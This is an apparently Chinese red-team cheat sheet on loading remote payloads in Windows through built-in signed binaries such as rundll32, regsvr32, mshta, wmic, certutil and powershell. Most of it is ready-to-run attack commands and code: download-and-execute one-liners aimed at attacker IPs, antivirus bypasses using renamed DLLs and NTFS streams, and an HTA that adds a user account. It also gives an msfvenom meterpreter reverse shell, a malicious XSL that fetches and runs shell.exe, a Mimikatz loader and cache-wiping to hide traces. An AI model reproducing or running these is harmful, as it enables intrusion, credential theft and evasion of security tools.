windows远程加载Payload代码执行归纳总结

概览说明

总体来讲高频使用的上线方法包括powershell、rundll32 、regsvr32、mshta，其他根据具体场景进行结合利用（参考免杀），像powershell、wmi都是综合的专题。类似powershell downloadstring、mshta、rundll32 都可以实现内存加载，无文件落地。

• 命令详解
  • rundll32
  • regsvr32
    • 远程加载sct文件
    • dll上线
    • bypass
  • mshta
    • 基础说明
    • Js&vbs
    • 正常上线
    • 注意事项
    • 报错类
  • msiexec
  • wmic
  • IEExec
  • pubprn.vbs
  • certutil
  • bitsadmin
  • regasm&regsvc
  • MSXSL.EXE
  • windows-wget
  • FTP
  • powershell
  • UNC
    • ipc$
    • copy
    • cmd.exe
    • msbuild
    • odbcconf
    • cscript
    • pcalua
• 参考
  • URL
  • INIT

命令详解

rundll32

其实还是依赖于WScript.shell这个组件，在这里我们使用JSRat来做演示，JSRat是一个命令和控制框架，仅为rundll32.exe和regsvr32.exe生成恶意程序。
项目地址：https://github.com/Hood3dRob1n/JSRat-Py.git

步骤一：开始运行JSRat，监听本地8888端口。
步骤二：通过url访问，可以查看恶意代码。
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.28.131:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
步骤三：在受害者PC运行该代码，将成功返回一个会话，如下图所示：

参考：https://github.com/3gstudent/Javascript-Backdoor

Rundll32还可以用来调用某些内联脚本：

未成功

其中，负责执行网络调用的是rundll32.exe，而命令会将下载的Payload文件写入到IE本地缓存之中。

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct");this.close()

regsvr32

远程加载sct文件

regsvr32命令用于注册COM组件，是Windows系统提供的用来向系统注册控件或者卸载控件的命令，以命令行方式运行
在目标机上执行：
regsvr32.exe /u /n /s /i:http://192.168.28.131:8888/file.sct scrobj.dll

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
regsvr32 /u /s /i:http://site.com/js.png scrobj.dll

可以通过自己构造.sct文件;js.png也是如此，去下载执行我们的程序
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <script language="JScript">
        <![CDATA[
            ps  = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);
        ]]>
</script>
</registration>
</scriptlet>

dll上线

regsvr32 artifact16.dll

But 有个弹窗, 点击确定后就掉线了

bypass

一般杀软 拦截情况为：http和scrobj.dll的组合

改个名字可以绕过，但是记得操作的时候在链接的dll目录下进行！

regsvr32.exe /i:http://example.com/file.sct /u /s Myscrobj.dll

• 改变 scrobj.dll 的名称

copy c:\windows\system32\scrobj.dll NothingToSeeHere.dll
Regsvr32.exe /u /s /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct NothingToSeeHere.dll

• 为 scrobj.dll 创建符号链接

Mklink Dave_LovesThis.dll c:\windows\system32\scrobj.dll
Regsvr32.exe /u /s /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Dave_LovesThis.dll

• 利用 NTFS ADS 功能绕过

type c:\Windows\System32\scrobj.dll > Just_A_Normal_TextFile.txt:PlacingTheDLLHere
Regsvr32.exe /u /s /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Just_A_Normal_TextFile.txt:PlacingTheDLLHere

• 先将 sct 文件放到本地，然后执行

bitsadmin /transfer download /download /priority normal https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct %TEMP%\test.txt && regsvr32.exe /s /u /i:%TEMP%\test.txt scrobj.dllRegsvr32.exe /u /s /i:Regsvr32_calc.sct scrobj.dll

• 直接调用scrobj.dll的DllInstall方法

其实可以不用regsvr32.exe，使用他的目的是因为他是 windows 自带的，有微软签名，如果不考虑这个的情况下其实可以写程序直接调用 scrobj.dll 的 DllInstall 方法实现代码执行。C#代码如下：

using System;using System.Reflection;using System.Runtime.InteropServices;using System.ComponentModel;namespace scrobj_call_csharp{    static class NativeMethod    {        [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]        public static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);        [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);    }    class Program    {        [UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Unicode)]        private delegate Int32 DllInstall(Boolean bInstall, String pszCmdLine);        static void Main(string[] args)        {            const string dllPath = "scrobj.dll";            IntPtr hDllScr = NativeMethod.LoadLibrary(dllPath);            if (hDllScr == IntPtr.Zero)            {                var lasterror = Marshal.GetLastWin32Error();                var innerEx = new Win32Exception(lasterror);                innerEx.Data.Add("LastWin32Error", lasterror);                throw new Exception("Can't load Dll " + dllPath, innerEx);            }            IntPtr DllInstallProcAddr = NativeMethod.GetProcAddress(hDllScr, "DllInstall");            DllInstall fDllInstall = (DllInstall)Marshal.GetDelegateForFunctionPointer(DllInstallProcAddr, typeof(DllInstall));            fDllInstall(false, "http://192.168.50.129:80/payload.sct");        }    }}

成功调用scrobj.dll的DllInstall 方法实现代码执行。

mshta

基础说明

实际上，mshta跟cscript/wscript是一类的，但是它还可以执行内联脚本，我们可以通过内联脚本来下载并执行Payload代码：

Js&vbs

它支持命令行参数，可以接收JS和VBS的方法。看示例（在命令行下测试）：

JS:

mshta vbscript:window.execScript(“alert(‘hello world!’);”,”javascript”)

VBS:

mshta javascript:window.execScript(“msgBox(‘hello world!’):window.close”,”vbs”)

mshta vbscript:Close(Execute("GetObject(""script:http://192.168.214.1:6677/sct.sct"")"))

ps:有请求，但并未执行。

正常上线

mshta用于执行.hta文件，而hta是HTML Applocation 的缩写，也就是HTML应用程序。而hta中也支持VBS。所以我们可以利用hta来下载文件。mshta http://192.168.28.128/run.htarun.hta内容如下：<HTML> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"><HEAD> <script language="VBScript">Window.ReSizeTo 0, 0Window.moveTo -2000,-2000Set objShell = CreateObject("Wscript.Shell")objShell.Run "cmd.exe /c net user test password /add" // 这里填写命令self.close</script><body>demo</body></HEAD> </HTML>

CS自带的powershell的 html application

注意事项

mshta支持http和htpps

但mshta在执行hta脚本时，类似于浏览器，会根据链接返回头进行对应的解析操作，所以这里只有当返回头为html时才会运行

否则会被当普通文本进行解析

对于github的代码，返回的格式为text/plain

如果使用如下命令执行：

mshta https://raw.githubusercontent.com/3gstudent/test/master/calc.hta

会把代码当成text，无法解析成html，导致脚本无法执行

但是我们可以换一个思路：

将hta文件传到github的博客下面，就能够被解析成html，实现代码执行

将hta文件上传至github博客下面，地址为https://3gstudent.github.io/test/calc.hta

执行如下命令：

mshta https://3gstudent.github.io/test/calc.hta

成功弹出计算器

报错类

弹框提示此计算机上的安全设置禁止访问其它域的数据源，如下图

解决方法：IE浏览器`-`Internet选项`-`安全选择`可信站点`，添加博客地址：https://3gstudent.github.io/自定义级别`，找到`通过域访问数据源`，选择`启用IE浏览器默认会拦截vbs脚本实现的下载功能

msiexec

用于安装Windows Installer安装包，可远程执行msi文件。#生成msi包msfvenom -p windows/exec CMD='net user test abc123! /add' -f msi > evil.msi#远程执行msiexec /q /i http://192.168.28.128/evil.msi

wmic

执行WMIC以下命令从远程服务器下载并运行恶意XSL文件：wmic os get /FORMAT:"http://192.168.28.128/evil.xsl"

<?xml version='1.0'?><xsl:stylesheet version="1.0"      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"      xmlns:msxsl="urn:schemas-microsoft-com:xslt"      xmlns:user="http://mycompany.com/mynamespace"><msxsl:script language="JScript" implements-prefix="user">   function xml(nodelist) {	var r = new ActiveXObject("WScript.Shell").Run("certutil.exe -urlcache -split -f http://lyshark.com/shell.exe");        var r = new ActiveXObject("WScript.Shell").Run("shell.exe");        return nodelist.nextNode().xml;   }</msxsl:script><xsl:template match="/">   <xsl:value-of select="user:xml(.)"/></xsl:template></xsl:stylesheet>

IEExec

需要管理员权限

IEexec.exe应用程序是.NET Framework附带程序，存在于多个系统白名单内。生成Payload：msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.28.131 lport=4444 -f exe -o evil.exe使用管理员身份打开cmd，分别运行下面两条命令。C:\Windows\Microsoft.NET\Framework64\v2.0.50727>caspol.exe -s offC:\Windows\Microsoft.NET\Framework64\v2.0.50727>IEExec.exe http://192.168.28.131/evil.exe

win7 测试失败

Win10 下载exe，执行需要单独命令

下载到缓存目录

C:\Users\xx\AppData\Local\Microsoft\Windows\INetCache\IE\K1C3JB46

pubprn.vbs

在Windows 7以上版本存在一个名为PubPrn.vbs的微软已签名WSH脚本，其位于C:\Windows\System32\Printing_Admin_Scripts\en-US，仔细观察该脚本可以发现其显然是由用户提供输入（通过命令行参数），之后再将参数传递给GetObject()

在Windows 7以上版本存在一个名为pubprn.vbs的微软已签名WSH脚本，可以利用来解析.sct脚本："C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs" 127.0.0.1 script:https://gist.githubusercontent."C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs" 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sctcscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1  script:http://192.168.214.1:6677/sct.sct

test.sct

<?XML version="1.0"?><scriptlet><registration    description="Bandit"    progid="Bandit"    version="1.00"    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"    remotable="true"    ></registration><script language="JScript"><![CDATA[        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");]]></script></scriptlet>

certutil

用于备份证书服务，支持xp-win10都支持。由于certutil下载文件都会留下缓存，所以一般都建议下载完文件后对缓存进行删除。注：缓存目录为：”%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content”#下载文件certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt test.php#删除缓存certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt delete

base64应用,可以将exe base64编号后，通过命令行写进去，然后还原回来。certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dllcertutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

bitsadmin

bitsadmin /transfer n http://192.168.28.128/imag/evil.txt d:\test\1.txt

（只能命令下载到指定路径上，win7以上;使用bitsadmin的下载速度较慢）

regasm&regsvc

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

不能URL， 只能UNC 、 Webdav

MSXSL.EXE

需要单独下载安装，不合适。

msxsl.exe是微软用于命令行下处理XSL的一个程序，所以通过他，我们可以执行JavaScript进而执行系统命令。下载地址为：https://www.microsoft.com/en-us/download/details.aspx?id=21714msxsl.exe 需要接受两个文件，XML及XSL文件，可以远程加载，具体方式如下：msxsl http://192.168.28.128/scripts/demo.xml http://192.168.28.128/scripts/exec.xslwin10,默认 安全设置不允许在此样式表内执行脚本代码。

Demo.xml

<?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="exec.xsl" ?><customers><customer><name>Microsoft</name></customer></customers>

exec.xsl

<?xml version='1.0'?><xsl:stylesheet version="1.0"xmlns:xsl="http://www.w3.org/1999/XSL/Transform"xmlns:msxsl="urn:schemas-microsoft-com:xslt"xmlns:user="http://mycompany.com/mynamespace"><msxsl:script language="JScript" implements-prefix="user">   function xml(nodelist) {var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");   return nodelist.nextNode().xml;   }</msxsl:script><xsl:template match="/">   <xsl:value-of select="user:xml(.)"/></xsl:template></xsl:stylesheet>

windows-wget

Windows环境下，可上传免安装的可执行程序wget.exe到目标机器，使用wget下载文件。wget.exe下载：https://eternallybored.org/misc/wget/wget -O "evil.txt" http://192.168.28.128/imag/evil.txt

FTP

一般情况下攻击者使用FTP上传文件需要很多交互的步骤，下面这个 bash脚本，考虑到了交互的情况，可以直接执行并不会产生交互动作。ftp 127.0.0.1usernamepasswordget fileexit

可以考虑脚本化自动下载功能

powershell

远程下载文件保存在本地：powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatzpowershell -exec bypass -f \\webdavserver\folder\payload.ps1远程执行命令：powershell (new-object System.Net.WebClient).DownloadFile( ‘http://192.168.168.183/1.exe’,’C:\111111111111111.exe’)powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg','d:\\1.jpg')

UNC

ipc$

ipc$（net user）

#建立远程IPC连接net use \\192.168.28.128\ipc$ /user:administrator "abc123!"#复制远程文件到本地主机copy \\192.168.28.128\c$\2.txt D:\test

copy

copy \\x.x.x.x\xx\poc.exexcopy d:\test.exe  \\x.x.x.x\test.exe

cmd.exe

cmd.exe /k < \\webdavserver\folder\batchfile.txt

msbuild

cmd /V /c “set MB=”C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe” & !MB! /noautoresponse /preprocess \webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml”

odbcconf

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

cscript

cscript //E:jscript \\webdavserver\folder\payload.txt

pcalua

pcalua.exe -a \\server\payload.dll

参考

URL

https://www.cnblogs.com/xiaozi/p/12721960.html

https://www.cnblogs.com/backlion/p/7908563.html

https://blog.csdn.net/qq_27446553/article/details/78694506

https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/fileless-threats 无文件攻击

https://paper.seebug.org/1103/ ATT&CK 之防御逃逸

战术	MITRE ATT&CK链接
XSL脚本代码代理执行	https://attack.mitre.org/techniques/T1220/
利用可信网络服务进行数据隐蔽传输	https://attack.mitre.org/techniques/T1102/
虚拟化和沙箱的检测	https://attack.mitre.org/techniques/T1497
受信任的开发人员实用程序利用	https://attack.mitre.org/techniques/T1127/
时间戳伪装	https://attack.mitre.org/techniques/T1099/
PubPrn代理脚本代码执行	https://attack.mitre.org/techniques/T1216/
签名二进制程序代理执行	https://attack.mitre.org/techniques/T1218/
Regsvr32代理代码执行	https://attack.mitre.org/techniques/T1117/
进程注入	https://attack.mitre.org/techniques/T1055/
利用NTFS ADS进行数据隐藏	https://attack.mitre.org/techniques/T1096/
Mshta代理执行脚本代码	https://attack.mitre.org/techniques/T1170/
CHM文件隐藏代码执行	https://attack.mitre.org/techniques/T1223/
CMSTP配置文件参数利用	https://attack.mitre.org/techniques/T1191/
本机程序编译代码执行	https://attack.mitre.org/techniques/T1500/
额外窗口内存注入	https://attack.mitre.org/techniques/T1181/
间接命令执行	https://attack.mitre.org/techniques/T1202/
解码文件并执行	https://attack.mitre.org/techniques/T1140/
控制面板文件代码执行	https://attack.mitre.org/techniques/T1196/
入侵痕迹清除	https://attack.mitre.org/techniques/T1070/
文件加壳	https://attack.mitre.org/techniques/T1045/
修改文件权限	https://attack.mitre.org/techniques/T1222/

INIT

1. 命令本身可以接受一个HTTP URL作为其中一个参数；
2. 命令接受一个UNC路径（指向一台WebDAV服务器）；
3. 命令能够执行一个小型的内联脚本（脚本负责完成下载任务）；

@subTee